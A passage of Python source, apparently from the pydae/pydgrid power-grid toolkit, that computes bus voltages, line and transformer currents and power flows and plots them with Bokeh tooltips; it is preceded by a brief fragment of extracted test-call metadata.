] | [((195, 226), 'ness.from_file', 'ness.from_file', (['"""sample.nessus"""'], {}), "('sample.nessus')\n", (209, 226), False, 'import ness\n'), ((325, 357), 'pytest.raises', 'pytest.raises', (['FileNotFoundError'], {}), '(FileNotFoundError)\n', (338, 357), False, 'import pytest\n'), ((367, 402), 'ness.from_file', 'ness.from_file', (['"""not-existant-path"""'], {}), "('not-existant-path')\n", (381, 402), False, 'import ness\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
2020
@author: jmmauricio
"""
import numpy as np
from pydae.tools import get_v,get_i,get_s
import json
from collections import namedtuple
import numba
class grid(object):
def __init__(self,syst):
#def bokeh_tools(data):
self.syst = syst
self.s_radio_scale = 0.01
self.s_radio_max = 20
self.s_radio_min = 1
with np.load('matrices.npz') as data:
Y_primitive = data['Y_primitive']
A_conect = data['A_conect']
nodes_list = data['nodes_list']
node_sorter = data['node_sorter']
Y_vv = data['Y_vv']
Y_vi = data['Y_vi']
N_v = int(data['N_v'])
self.nodes_list = nodes_list
self.Y_primitive = Y_primitive
self.A_conect = A_conect
self.node_sorter = node_sorter
self.Y_vv = Y_vv
self.Y_vi = Y_vi
self.N_v = N_v
        json_file = 'grid_data.json'
json_data = open(json_file).read().replace("'",'"')
data = json.loads(json_data)
self.buses = data['buses']
if 'transformers' in data:
self.transformers = data['transformers']
else:
self.transformers = []
self.lines = data['lines']
self.loads = data['loads']
if 'vscs' in data:
self.vscs = data['vscs']
else: self.vscs = []
def dae2vi(self):
'''
        Obtain line currents from node voltages once the power flow has been solved.
Returns
-------
None.
'''
n2a = {'1':'a','2':'b','3':'c','4':'n'}
a2n = {'a':1,'b':2,'c':3,'n':4}
V_node_list = []
I_node_list = [0.0]*len(self.nodes_list)
self.I_node_list = I_node_list
for item in self.nodes_list:
bus_name,phase_name = item.split('.')
#i = get_i(self.syst,bus_name,phase_name=n2a[phase_name],i_type='phasor',dq_name='ri')
#I_node_list += [i]
v = get_v(self.syst,bus_name,phase_name=n2a[phase_name],v_type='phasor',dq_name='ri')
V_node_list += [v]
V_node = np.array(V_node_list).reshape(len(V_node_list),1)
V_known = np.copy(V_node[:self.N_v])
V_unknown = np.copy(V_node[self.N_v:])
I_unknown = self.Y_vv @ V_known + self.Y_vi @ V_unknown
#self.I_node = I_node
self.V_node = V_node
self.I_unknown = I_unknown
self.I_known = np.array(I_node_list).reshape(len(I_node_list),1)
self.I_node = np.vstack((self.I_unknown,self.I_known))
for load in self.loads:
bus_name = load['bus']
if load['type'] == '3P+N':
for ph in ['a','b','c','n']:
idx = list(self.nodes_list).index(f"{load['bus']}.{a2n[ph]}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
if load['type'] == '1P+N':
ph = load['bus_nodes'][0]
idx = list(self.nodes_list).index(f"{load['bus']}.{ph}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
ph = load['bus_nodes'][1]
idx = list(self.nodes_list).index(f"{load['bus']}.{ph}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
for vsc in self.vscs:
bus_name = vsc['bus_ac']
phases = ['a','b','c','n']
if vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq':
phases = ['a','b','c']
for ph in phases:
idx = list(self.nodes_list).index(f"{vsc['bus_ac']}.{a2n[ph]}")
i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
if not vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq':
bus_name = vsc['bus_dc']
for ph in ['a','n']:
idx = list(self.nodes_list).index(f"{vsc['bus_dc']}.{a2n[ph]}")
i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='r')
self.I_node[idx] += i_
I_lines = self.Y_primitive @ self.A_conect.T @ self.V_node
self.I_lines = I_lines
def get_v(self):
'''
Compute phase-neutral and phase-phase voltages from power flow solution and put values
in buses dictionary.
'''
res = {}
V_sorted = []
I_sorted = []
S_sorted = []
start_node = 0
self.V_results = self.V_node
# self.I_results = self.I_node
V_sorted = self.V_node[self.node_sorter]
I_sorted = self.I_node[self.node_sorter]
nodes2string = ['v_an','v_bn','v_cn','v_gn']
for bus in self.buses:
N_nodes = bus['N_nodes']
# for node in range(5):
# bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node))
# if bus_node in self.nodes:
# V = self.V_results[self.nodes.index(bus_node)][0]
# V_sorted += [V]
# nodes_in_bus += [node]
# for node in range(5):
# bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node))
# if bus_node in self.nodes:
# I = self.I_results[self.nodes.index(bus_node)][0]
# I_sorted += [I]
if N_nodes==3: # if 3 phases
v_ag = V_sorted[start_node+0,0]
v_bg = V_sorted[start_node+1,0]
v_cg = V_sorted[start_node+2,0]
i_a = I_sorted[start_node+0,0]
i_b = I_sorted[start_node+1,0]
i_c = I_sorted[start_node+2,0]
s_a = (v_ag)*np.conj(i_a)
s_b = (v_bg)*np.conj(i_b)
s_c = (v_cg)*np.conj(i_c)
start_node += 3
bus.update({'v_an':np.abs(v_ag),
'v_bn':np.abs(v_bg),
'v_cn':np.abs(v_cg),
'v_ng':0.0})
bus.update({'deg_an':np.angle(v_ag, deg=True),
'deg_bn':np.angle(v_bg, deg=True),
'deg_cn':np.angle(v_cg, deg=True),
'deg_ng':np.angle(0, deg=True)})
bus.update({'v_ab':np.abs(v_ag-v_bg),
'v_bc':np.abs(v_bg-v_cg),
'v_ca':np.abs(v_cg-v_ag)})
bus.update({'p_a':s_a.real,
'p_b':s_b.real,
'p_c':s_c.real})
bus.update({'q_a':s_a.imag,
'q_b':s_b.imag,
'q_c':s_c.imag})
tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg'])
res.update({bus['bus']:tup(v_ag,v_bg,v_cg)})
if N_nodes==4: # if 3 phases + neutral
v_ag = V_sorted[start_node+0,0]
v_bg = V_sorted[start_node+1,0]
v_cg = V_sorted[start_node+2,0]
v_ng = V_sorted[start_node+3,0]
i_a = I_sorted[start_node+0,0]
i_b = I_sorted[start_node+1,0]
i_c = I_sorted[start_node+2,0]
i_n = I_sorted[start_node+3,0]
v_an = v_ag-v_ng
v_bn = v_bg-v_ng
v_cn = v_cg-v_ng
s_a = (v_an)*np.conj(i_a)
s_b = (v_bn)*np.conj(i_b)
s_c = (v_cn)*np.conj(i_c)
bus.update({'v_an':np.abs(v_an),
'v_bn':np.abs(v_bn),
'v_cn':np.abs(v_cn),
'v_ng':np.abs(v_ng)})
bus.update({'deg_an':np.angle(v_ag-v_ng, deg=True),
'deg_bn':np.angle(v_bg-v_ng, deg=True),
'deg_cn':np.angle(v_cg-v_ng, deg=True),
'deg_ng':np.angle(v_ng, deg=True)})
bus.update({'v_ab':np.abs(v_ag-v_bg),
'v_bc':np.abs(v_bg-v_cg),
'v_ca':np.abs(v_cg-v_ag)})
bus.update({'p_a':s_a.real,
'p_b':s_b.real,
'p_c':s_c.real})
bus.update({'q_a':s_a.imag,
'q_b':s_b.imag,
'q_c':s_c.imag})
start_node += 4
tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg', 'v_ng','v_an', 'v_bn', 'v_cn'])
res.update({bus['bus']:tup(v_ag,v_bg,v_cg,v_ng,v_an,v_bn,v_cn)})
self.V = np.array(V_sorted).reshape(len(V_sorted),1)
self.res = res
return 0 #self.V
def get_i(self):
'''
Compute line currents from power flow solution and put values
in transformers and lines dictionaries.
'''
I_lines =self.I_lines
it_single_line = 0
for trafo in self.transformers:
if 'conductors_j' in trafo:
cond_1 = trafo['conductors_j']
else:
cond_1 = trafo['conductors_1']
if 'conductors_k' in trafo:
cond_2 = trafo['conductors_k']
else:
cond_2 = trafo['conductors_2']
I_1a = (I_lines[it_single_line,0])
I_1b = (I_lines[it_single_line+1,0])
I_1c = (I_lines[it_single_line+2,0])
I_1n = (I_lines[it_single_line+3,0])
I_2a = (I_lines[it_single_line+cond_1+0,0])
I_2b = (I_lines[it_single_line+cond_1+1,0])
I_2c = (I_lines[it_single_line+cond_1+2,0])
if cond_1>3: I_1n = (I_lines[it_single_line+cond_1+3,0])
if cond_2>3: I_2n = (I_lines[it_single_line+cond_2+3,0])
#I_n = (I_lines[it_single_line+3,0])
if cond_1 <=3:
I_1n = I_1a+I_1b+I_1c
if cond_2 <=3:
I_2n = I_2a+I_2b+I_2c
it_single_line += cond_1 + cond_2
trafo.update({'i_1a_m':np.abs(I_1a)})
trafo.update({'i_1b_m':np.abs(I_1b)})
trafo.update({'i_1c_m':np.abs(I_1c)})
trafo.update({'i_1n_m':np.abs(I_1n)})
trafo.update({'i_2a_m':np.abs(I_2a)})
trafo.update({'i_2b_m':np.abs(I_2b)})
trafo.update({'i_2c_m':np.abs(I_2c)})
trafo.update({'i_2n_m':np.abs(I_2n)})
trafo.update({'deg_1a':np.angle(I_1a, deg=True)})
trafo.update({'deg_1b':np.angle(I_1b, deg=True)})
trafo.update({'deg_1c':np.angle(I_1c, deg=True)})
trafo.update({'deg_1n':np.angle(I_1n, deg=True)})
trafo.update({'deg_2a':np.angle(I_2a, deg=True)})
trafo.update({'deg_2b':np.angle(I_2b, deg=True)})
trafo.update({'deg_2c':np.angle(I_2c, deg=True)})
trafo.update({'deg_2n':np.angle(I_2n, deg=True)})
self.I_lines = I_lines
for line in self.lines:
if line['type'] == 'z':
N_conductors = len(line['bus_j_nodes'])
if N_conductors == 3:
I_a = (I_lines[it_single_line,0])
I_b = (I_lines[it_single_line+1,0])
I_c = (I_lines[it_single_line+2,0])
#I_n = (I_lines[it_single_line+3,0])
I_n = I_a+I_b+I_c
                    alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_a+I_b+I_c)
i_p = 1.0/3.0*(I_a + I_b*alpha + I_c*alpha**2)
i_n = 1.0/3.0*(I_a + I_b*alpha**2 + I_c*alpha)
it_single_line += N_conductors
line.update({'i_j_a_m':np.abs(I_a)})
line.update({'i_j_b_m':np.abs(I_b)})
line.update({'i_j_c_m':np.abs(I_c)})
line.update({'i_j_n_m':np.abs(I_n)})
line.update({'deg_j_a':np.angle(I_a, deg=True)})
line.update({'deg_j_b':np.angle(I_b, deg=True)})
line.update({'deg_j_c':np.angle(I_c, deg=True)})
line.update({'deg_j_n':np.angle(I_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_a)})
line.update({'i_k_b_m':np.abs(I_b)})
line.update({'i_k_c_m':np.abs(I_c)})
line.update({'i_k_n_m':np.abs(I_n)})
line.update({'deg_k_a':np.angle(I_a, deg=True)})
line.update({'deg_k_b':np.angle(I_b, deg=True)})
line.update({'deg_k_c':np.angle(I_c, deg=True)})
line.update({'deg_k_n':np.angle(I_n, deg=True)})
line.update({'i_z':np.abs(i_z)})
line.update({'i_p':np.abs(i_p)})
line.update({'i_n':np.abs(i_n)})
if N_conductors == 4:
I_a = (I_lines[it_single_line,0])
I_b = (I_lines[it_single_line+1,0])
I_c = (I_lines[it_single_line+2,0])
I_n = (I_lines[it_single_line+3,0])
it_single_line += N_conductors
line.update({'i_j_a_m':np.abs(I_a)})
line.update({'i_j_b_m':np.abs(I_b)})
line.update({'i_j_c_m':np.abs(I_c)})
line.update({'i_j_n_m':np.abs(I_n)})
line.update({'deg_j_a':np.angle(I_a, deg=True)})
line.update({'deg_j_b':np.angle(I_b, deg=True)})
line.update({'deg_j_c':np.angle(I_c, deg=True)})
line.update({'deg_j_n':np.angle(I_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_a)})
line.update({'i_k_b_m':np.abs(I_b)})
line.update({'i_k_c_m':np.abs(I_c)})
line.update({'i_k_n_m':np.abs(I_n)})
line.update({'deg_k_a':np.angle(I_a, deg=True)})
line.update({'deg_k_b':np.angle(I_b, deg=True)})
line.update({'deg_k_c':np.angle(I_c, deg=True)})
line.update({'deg_k_n':np.angle(I_n, deg=True)})
if line['type'] == 'pi':
N_conductors = len(line['bus_j_nodes'])
if N_conductors == 3:
I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0]
I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0]
I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0]
I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0]
I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0]
I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0]
#I_n = (I_lines[it_single_line+3,0])
I_j_n = I_j_a+I_j_b+I_j_c
I_k_n = I_k_a+I_k_b+I_k_c
                    alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_j_a+I_j_b+I_j_c)
i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2)
i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha)
it_single_line += N_conductors*3
line.update({'i_j_a_m':np.abs(I_j_a)})
line.update({'i_j_b_m':np.abs(I_j_b)})
line.update({'i_j_c_m':np.abs(I_j_c)})
line.update({'i_j_n_m':np.abs(I_j_n)})
line.update({'deg_j_a':np.angle(I_j_a, deg=True)})
line.update({'deg_j_b':np.angle(I_j_b, deg=True)})
line.update({'deg_j_c':np.angle(I_j_c, deg=True)})
line.update({'deg_j_n':np.angle(I_j_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_k_a)})
line.update({'i_k_b_m':np.abs(I_k_b)})
line.update({'i_k_c_m':np.abs(I_k_c)})
line.update({'i_k_n_m':np.abs(I_k_n)})
line.update({'deg_k_a':np.angle(I_k_a, deg=True)})
line.update({'deg_k_b':np.angle(I_k_b, deg=True)})
line.update({'deg_k_c':np.angle(I_k_c, deg=True)})
line.update({'deg_k_n':np.angle(I_k_n, deg=True)})
line.update({'i_z':np.abs(i_z)})
line.update({'i_p':np.abs(i_p)})
line.update({'i_n':np.abs(i_n)})
if N_conductors == 4:
I_j_a = I_lines[it_single_line+0,0]+I_lines[it_single_line+3,0]
I_j_b = I_lines[it_single_line+1,0]+I_lines[it_single_line+4,0]
I_j_c = I_lines[it_single_line+2,0]+I_lines[it_single_line+5,0]
I_k_a = I_lines[it_single_line+0,0]-I_lines[it_single_line+6,0]
I_k_b = I_lines[it_single_line+1,0]-I_lines[it_single_line+7,0]
I_k_c = I_lines[it_single_line+2,0]-I_lines[it_single_line+8,0]
I_j_n = I_lines[it_single_line+3,0]
I_k_n = I_lines[it_single_line+3,0]
#I_n = (I_lines[it_single_line+3,0])
I_j_n = I_j_a+I_j_b+I_j_c
I_k_n = I_k_a+I_k_b+I_k_c
                    alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_j_a+I_j_b+I_j_c)
i_p = 1.0/3.0*(I_j_a + I_j_b*alpha + I_j_c*alpha**2)
i_n = 1.0/3.0*(I_j_a + I_j_b*alpha**2 + I_j_c*alpha)
it_single_line += N_conductors*3
line.update({'i_j_a_m':np.abs(I_j_a)})
line.update({'i_j_b_m':np.abs(I_j_b)})
line.update({'i_j_c_m':np.abs(I_j_c)})
line.update({'i_j_n_m':np.abs(I_j_n)})
line.update({'deg_j_a':np.angle(I_j_a, deg=True)})
line.update({'deg_j_b':np.angle(I_j_b, deg=True)})
line.update({'deg_j_c':np.angle(I_j_c, deg=True)})
line.update({'deg_j_n':np.angle(I_j_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_k_a)})
line.update({'i_k_b_m':np.abs(I_k_b)})
line.update({'i_k_c_m':np.abs(I_k_c)})
line.update({'i_k_n_m':np.abs(I_k_n)})
line.update({'deg_k_a':np.angle(I_k_a, deg=True)})
line.update({'deg_k_b':np.angle(I_k_b, deg=True)})
line.update({'deg_k_c':np.angle(I_k_c, deg=True)})
line.update({'deg_k_n':np.angle(I_k_n, deg=True)})
def bokeh_tools(self):
self.bus_tooltip = '''
<div>
bus_id = @bus_id     | u<sub>avg</sub>= @u_avg_pu pu | u<sub>unb</sub>= @v_unb %
<table border="1">
<tr>
<td>v<sub>an</sub> = @v_an ∠ @deg_an V </td> <td> S<sub>a</sub> = @p_a + j@q_a kVA</td>
</tr>
<tr>
<td> </td> <td>v<sub>ab</sub>= @v_ab V</td>
</tr>
<tr>
<td>v<sub>bn</sub> = @v_bn ∠ @deg_bn V </td><td> S<sub>b</sub> = @p_b + j@q_b kVA</td>
</tr>
<tr>
<td> </td><td>v<sub>bc</sub>= @v_bc V</td>
</tr>
<tr>
<td>v<sub>cn</sub> = @v_cn ∠ @deg_cn V </td> <td>S<sub>c</sub> = @p_c + j@q_c kVA </td>
</tr>
<tr>
<td> </td> <td>v<sub>ca</sub>= @v_ca V</td>
</tr>
<tr>
<td>v<sub>ng</sub> = @v_ng ∠ @deg_ng V</td> <td>S<sub>abc</sub> = @p_abc + j@q_abc kVA </td>
</tr>
</table>
</div>
'''
x = [item['pos_x'] for item in self.buses]
y = [item['pos_y'] for item in self.buses]
bus_id = [item['bus'] for item in self.buses]
v_an = ['{:2.2f}'.format(float(item['v_an'])) for item in self.buses]
v_bn = ['{:2.2f}'.format(float(item['v_bn'])) for item in self.buses]
v_cn = ['{:2.2f}'.format(float(item['v_cn'])) for item in self.buses]
v_ng = ['{:2.2f}'.format(float(item['v_ng'])) for item in self.buses]
sqrt3=np.sqrt(3)
u_avg_pu = []
v_unb = []
for item in self.buses:
V_base = float(item['U_kV'])*1000.0/sqrt3
v_an_float = float(item['v_an'])
v_bn_float = float(item['v_bn'])
v_cn_float = float(item['v_cn'])
v_ng_float = float(item['v_ng'])
v_abc = np.array([v_an_float,v_bn_float,v_cn_float])
v_avg = np.average(v_abc)
unb = float(np.max(np.abs(v_abc-v_avg))/v_avg)
v_avg_pu = float(v_avg/V_base)
u_avg_pu += ['{:2.3f}'.format(v_avg_pu)]
v_unb += ['{:2.1f}'.format(unb*100)]
v_an_pu = ['{:2.4f}'.format(float(item['v_an'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_bn_pu = ['{:2.4f}'.format(float(item['v_bn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_cn_pu = ['{:2.4f}'.format(float(item['v_cn'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
v_ng_pu = ['{:2.4f}'.format(float(item['v_ng'])/float(item['U_kV'])/1000.0*sqrt3) for item in self.buses]
deg_an = ['{:2.2f}'.format(float(item['deg_an'])) for item in self.buses]
deg_bn = ['{:2.2f}'.format(float(item['deg_bn'])) for item in self.buses]
deg_cn = ['{:2.2f}'.format(float(item['deg_cn'])) for item in self.buses]
deg_ng = ['{:2.2f}'.format(float(item['deg_ng'])) for item in self.buses]
v_ab = [item['v_ab'] for item in self.buses]
v_bc = [item['v_bc'] for item in self.buses]
v_ca = [item['v_ca'] for item in self.buses]
p_a = ['{:2.2f}'.format(float(item['p_a']/1000)) for item in self.buses]
p_b = ['{:2.2f}'.format(float(item['p_b']/1000)) for item in self.buses]
p_c = ['{:2.2f}'.format(float(item['p_c']/1000)) for item in self.buses]
q_a = ['{:2.2f}'.format(float(item['q_a']/1000)) for item in self.buses]
q_b = ['{:2.2f}'.format(float(item['q_b']/1000)) for item in self.buses]
q_c = ['{:2.2f}'.format(float(item['q_c']/1000)) for item in self.buses]
p_abc = ['{:2.2f}'.format(float((item['p_a'] +item['p_b']+item['p_c'])/1000)) for item in self.buses]
q_abc = ['{:2.2f}'.format(float((item['q_a'] +item['q_b']+item['q_c'])/1000)) for item in self.buses]
s_radio = []
s_color = []
for item in self.buses:
p_total = item['p_a'] + item['p_b'] + item['p_c']
q_total = item['q_a'] + item['q_b'] + item['q_c']
s_total = np.abs(p_total + 1j*q_total)
scale = self.s_radio_scale
s_scaled = abs(np.sqrt(s_total))*scale
if s_scaled<self.s_radio_min :
s_scaled = self.s_radio_min
if s_scaled>self.s_radio_max:
s_scaled = self.s_radio_max
s_radio += [s_scaled]
if p_total>0.0:
s_color += ['red']
if p_total<0.0:
s_color += ['green']
if p_total==0.0:
s_color += ['blue']
self.bus_data = dict(x=x, y=y, bus_id=bus_id, u_avg_pu=u_avg_pu, v_unb=v_unb,
v_an=v_an, v_bn=v_bn, v_cn=v_cn, v_ng=v_ng,
v_an_pu=v_an_pu, v_bn_pu=v_bn_pu, v_cn_pu=v_cn_pu,
deg_an=deg_an, deg_bn=deg_bn, deg_cn=deg_cn,
deg_ng=deg_ng,v_ab=v_ab,v_bc=v_bc,v_ca=v_ca,
p_a=p_a,p_b=p_b,p_c=p_c,
q_a=q_a,q_b=q_b,q_c=q_c,
p_abc=p_abc,q_abc=q_abc,
s_radio=s_radio, s_color=s_color)
self.line_tooltip = '''
<div>
line id = @line_id
<table border="1">
<tr>
<td>I<sub>a</sub> = @i_a_m ∠ @deg_a A</td>
</tr>
<tr>
<td>I<sub>b</sub> = @i_b_m ∠ @deg_b A</td>
</tr>
<tr>
<td>I<sub>c</sub> = @i_c_m ∠ @deg_c A</td>
</tr>
<tr>
<td>I<sub>n</sub> = @i_n_m ∠ @deg_n A</td>
</tr>
</table>
</div>
'''
self.line_tooltip = '''
<div>
line id = @line_id
<table border="5">
<tr >
<td>I<sub>ja</sub> = @i_j_a_m ∠ @deg_j_a </td>
<td>I<sub>ka</sub> = @i_k_a_m ∠ @deg_k_a </td>
</tr>
<tr>
<td >I<sub>jb</sub> = @i_j_b_m ∠ @deg_j_b </td>
<td >I<sub>kb</sub> = @i_k_b_m ∠ @deg_k_b </td>
</tr>
<tr>
<td >I<sub>jc</sub> = @i_j_c_m ∠ @deg_j_c </td>
<td >I<sub>kc</sub> = @i_k_c_m ∠ @deg_k_c </td>
</tr>
<tr>
<td >I<sub>jn</sub> = @i_j_n_m ∠ @deg_j_n </td>
<td >I<sub>kn</sub> = @i_k_n_m ∠ @deg_k_n </td>
</tr>
</table>
</div>
'''
bus_id_to_x = dict(zip(bus_id,x))
bus_id_to_y = dict(zip(bus_id,y))
x_j = [bus_id_to_x[item['bus_j']] for item in self.lines]
y_j = [bus_id_to_y[item['bus_j']] for item in self.lines]
x_k = [bus_id_to_x[item['bus_k']] for item in self.lines]
y_k = [bus_id_to_y[item['bus_k']] for item in self.lines]
x_s = []
y_s = []
for line in self.lines:
x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]]
y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]]
i_j_a_m = [item['i_j_a_m'] for item in self.lines]
i_j_b_m = [item['i_j_b_m'] for item in self.lines]
i_j_c_m = [item['i_j_c_m'] for item in self.lines]
i_j_n_m = [item['i_j_n_m'] for item in self.lines]
i_k_a_m = [item['i_k_a_m'] for item in self.lines]
i_k_b_m = [item['i_k_b_m'] for item in self.lines]
i_k_c_m = [item['i_k_c_m'] for item in self.lines]
i_k_n_m = [item['i_k_n_m'] for item in self.lines]
deg_j_a = [item['deg_j_a'] for item in self.lines]
deg_j_b = [item['deg_j_b'] for item in self.lines]
deg_j_c = [item['deg_j_c'] for item in self.lines]
deg_j_n = [item['deg_j_n'] for item in self.lines]
deg_k_a = [item['deg_k_a'] for item in self.lines]
deg_k_b = [item['deg_k_b'] for item in self.lines]
deg_k_c = [item['deg_k_c'] for item in self.lines]
deg_k_n = [item['deg_k_n'] for item in self.lines]
line_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.lines]
# self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id,
# i_a_m=i_a_m)
self.line_data = dict(x_s=x_s, y_s=y_s, line_id=line_id,
i_j_a_m=i_j_a_m, i_j_b_m=i_j_b_m, i_j_c_m=i_j_c_m, i_j_n_m=i_j_n_m,
i_k_a_m=i_k_a_m, i_k_b_m=i_k_b_m, i_k_c_m=i_k_c_m, i_k_n_m=i_k_n_m,
deg_j_a=deg_j_a, deg_j_b=deg_j_b, deg_j_c=deg_j_c, deg_j_n=deg_j_n,
deg_k_a=deg_k_a, deg_k_b=deg_k_b, deg_k_c=deg_k_c, deg_k_n=deg_k_n)
self.transformer_tooltip = '''
<div>
transformer id = @trafo_id
<table border="5">
<tr >
<td>I<sub>1a</sub> = @i_1a_m ∠ @deg_1a </td>
<td>I<sub>2a</sub> = @i_2a_m ∠ @deg_2a </td>
</tr>
<tr>
<td >I<sub>1b</sub> = @i_1b_m ∠ @deg_1b </td>
<td >I<sub>2b</sub> = @i_2b_m ∠ @deg_2b </td>
</tr>
<tr>
<td >I<sub>1c</sub> = @i_1c_m ∠ @deg_1c </td>
<td >I<sub>2c</sub> = @i_2c_m ∠ @deg_2c </td>
</tr>
<tr>
<td >I<sub>1n</sub> = @i_1n_m ∠ @deg_1n </td>
<td >I<sub>2n</sub> = @i_2n_m ∠ @deg_2n </td>
</tr>
</table>
</div>
'''
bus_id_to_x = dict(zip(bus_id,x))
bus_id_to_y = dict(zip(bus_id,y))
x_j = [bus_id_to_x[item['bus_j']] for item in self.transformers]
y_j = [bus_id_to_y[item['bus_j']] for item in self.transformers]
x_k = [bus_id_to_x[item['bus_k']] for item in self.transformers]
y_k = [bus_id_to_y[item['bus_k']] for item in self.transformers]
x_s = []
y_s = []
for line in self.transformers:
x_s += [[ bus_id_to_x[line['bus_j']] , bus_id_to_x[line['bus_k']]]]
y_s += [[ bus_id_to_y[line['bus_j']] , bus_id_to_y[line['bus_k']]]]
i_1a_m = [item['i_1a_m'] for item in self.transformers]
i_1b_m = [item['i_1b_m'] for item in self.transformers]
i_1c_m = [item['i_1c_m'] for item in self.transformers]
i_1n_m = [item['i_1n_m'] for item in self.transformers]
i_2a_m = [item['i_2a_m'] for item in self.transformers]
i_2b_m = [item['i_2b_m'] for item in self.transformers]
i_2c_m = [item['i_2c_m'] for item in self.transformers]
i_2n_m = [item['i_2n_m'] for item in self.transformers]
deg_1a = [item['deg_1a'] for item in self.transformers]
deg_1b = [item['deg_1b'] for item in self.transformers]
deg_1c = [item['deg_1c'] for item in self.transformers]
deg_1n = [item['deg_1n'] for item in self.transformers]
deg_2a = [item['deg_2a'] for item in self.transformers]
deg_2b = [item['deg_2b'] for item in self.transformers]
deg_2c = [item['deg_2c'] for item in self.transformers]
deg_2n = [item['deg_2n'] for item in self.transformers]
trafo_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.transformers]
# self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id,
# i_a_m=i_a_m)
self.transformer_data = dict(x_s=x_s, y_s=y_s, trafo_id=trafo_id,
i_1a_m=i_1a_m, i_1b_m=i_1b_m, i_1c_m=i_1c_m, i_1n_m=i_1n_m,
deg_1a=deg_1a, deg_1b=deg_1b, deg_1c=deg_1c, deg_1n=deg_1n,
i_2a_m=i_2a_m, i_2b_m=i_2b_m, i_2c_m=i_2c_m, i_2n_m=i_2n_m,
deg_2a=deg_2a, deg_2b=deg_2b, deg_2c=deg_2c, deg_2n=deg_2n)
return self.bus_data
from bokeh.io import output_notebook, show
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.io import push_notebook
from bokeh.resources import INLINE
output_notebook(INLINE)
def plot_results(grid):
#grid.bokeh_tools()
p = figure(width=600, height=400,
title='Results')
# trafos:
source = ColumnDataSource(grid.transformer_data)
trafo = p.multi_line(source=source, xs='x_s', ys='y_s', color="green", alpha=0.5, line_width=5)
# lines:
source = ColumnDataSource(grid.line_data)
lin = p.multi_line(source=source, xs='x_s', ys='y_s', color="red", alpha=0.5, line_width=5)
# buses:
source = ColumnDataSource(grid.bus_data)
cr = p.circle(source=source, x='x', y='y', size=15, color="navy", alpha=0.5)
p.add_tools(HoverTool(renderers=[trafo], tooltips=grid.transformer_tooltip))
p.add_tools(HoverTool(renderers=[lin], tooltips=grid.line_tooltip))
p.add_tools(HoverTool(renderers=[cr], tooltips=grid.bus_tooltip))
show(p)
return p
def get_flow(grid_obj,bus_j,bus_k,mode='total',model='pydgrid_pydae'):
if model == 'pydgrid_pydae':
v_a = grid_obj.get_values(f'v_{bus_j}_a_r') + 1j* grid_obj.get_values(f'v_{bus_j}_a_i')
i_l_a = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_i')
v_b = grid_obj.get_values(f'v_{bus_j}_b_r') + 1j* grid_obj.get_values(f'v_{bus_j}_b_i')
i_l_b = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_i')
v_c = grid_obj.get_values(f'v_{bus_j}_c_r') + 1j* grid_obj.get_values(f'v_{bus_j}_c_i')
i_l_c = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_i')
s_a = v_a*np.conj(i_l_a)
s_b = v_b*np.conj(i_l_b)
s_c = v_c*np.conj(i_l_c)
if mode == 'total':
s_t = s_a + s_b + s_c
return s_t
if mode == 'abc':
return s_a,s_b,s_c
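# Usage sketch (added for illustration, not part of the original file): `grid` and the
# bus names below are assumed placeholders for a solved pydgrid/pydae model.
#
#     s_total = get_flow(grid, 'B1', 'B2', mode='total')      # total complex power B1 -> B2
#     s_a, s_b, s_c = get_flow(grid, 'B1', 'B2', mode='abc')  # per-phase complex powers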
def set_voltage(grid_obj,bus_name,voltage,phase):
'''
    Set a new balanced three-phase voltage at a grid feeder bus.
Parameters
----------
grid_obj : object of pydgrid.grid class
bus_name : string
name of the grid feeder bus.
